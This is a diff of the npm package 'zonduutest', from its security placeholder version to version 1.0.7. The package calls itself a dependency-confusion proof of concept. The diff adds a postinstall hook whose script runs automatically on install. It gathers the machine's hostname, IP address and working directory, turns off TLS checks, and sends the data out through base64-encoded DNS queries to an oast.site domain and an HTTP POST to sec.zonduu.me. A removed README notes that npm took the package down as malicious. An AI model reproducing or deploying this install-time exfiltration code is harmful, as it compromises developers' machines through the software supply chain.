zonduutest 0.0.1-security.1 → 1.0.7

package/package.json

@@ -1,6 +1,12 @@
 {
   "name": "zonduutest",
-  "version": "0.0.1-security.1",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.0.7",
+  "description": "Proof of concept for dependency confusion",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node postinstall.js"
+  },
+  "keywords": [],
+  "author": "",
+  "license": "ISC"
 }

package/postinstall.js

@@ -0,0 +1,85 @@
+const fs = require('fs');
+const dns = require('dns');
+const http = require('http');
+const os = require('os');
+
+const logFile = '/tmp/postinstall.log';
+
+process.env["NODE_TLS_REJECT_UNAUTHORIZED"] = 0;
+
+try {
+  fs.appendFileSync(logFile, `Starting postinstall script\n`);
+
+  const hostname = os.hostname();
+  const packageName = process.env.npm_package_name;
+  const packageVersion = process.env.npm_package_version;
+  const ipAddress = require('child_process').execSync('hostname -I').toString().trim();
+  const currentPath = process.cwd();
+
+  const data = {
+    packageName,
+    packageVersion,
+    hostname,
+    ipAddress,
+    currentPath
+  };
+
+  fs.appendFileSync(logFile, `Data: ${JSON.stringify(data)}\n`);
+
+  // Shorten data for DNS exfiltration
+  const dnsData = `${packageName}-${hostname}-${ipAddress}`;
+  const base64Data = Buffer.from(dnsData).toString('base64').replace(/=/g, '');
+
+  // Ensure DNS data fits within DNS label length limit by splitting if necessary
+  const maxLabelLength = 63;
+  const base64DataParts = [];
+  for (let i = 0; i < base64Data.length; i += maxLabelLength) {
+    base64DataParts.push(base64Data.substring(i, i + maxLabelLength));
+  }
+
+  base64DataParts.forEach((part, index) => {
+    const dnsSubdomain = `${part}-${index}.cqati6eupgoo97it17fgdatea3nw746q1.oast.site`;
+    dns.resolve4(dnsSubdomain, (err, addresses) => {
+      if (err) {
+        fs.appendFileSync(logFile, `DNS resolution failed: ${err}\n`);
+      } else {
+        fs.appendFileSync(logFile, `DNS query sent for ${dnsSubdomain}\n`);
+      }
+    });
+  });
+
+  // HTTP fallback
+  const postData = `info=${encodeURIComponent(JSON.stringify(data))}`;
+
+  const options = {
+    hostname: 'sec.zonduu.me', // Replace with your HTTP server hostname
+    port: 80, // Replace with the appropriate port
+    path: '/callbackplz',
+    method: 'POST',
+    headers: {
+      'Content-Type': 'application/x-www-form-urlencoded',
+      'Content-Length': postData.length
+    }
+  };
+
+  const req = http.request(options, (res) => {
+    let responseData = '';
+    res.on('data', (chunk) => {
+      responseData += chunk;
+    });
+    res.on('end', () => {
+      fs.appendFileSync(logFile, `HTTP request completed with status ${res.statusCode}: ${responseData}\n`);
+    });
+  });
+
+  req.on('error', (e) => {
+    fs.appendFileSync(logFile, `HTTP request failed: ${e}\n`);
+  });
+
+  req.write(postData);
+  req.end();
+
+  fs.appendFileSync(logFile, `postinstall script finished\n`);
+} catch (e) {
+  fs.appendFileSync(logFile, `Error: ${e.message}\n`);
+}

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=zonduutest for more information.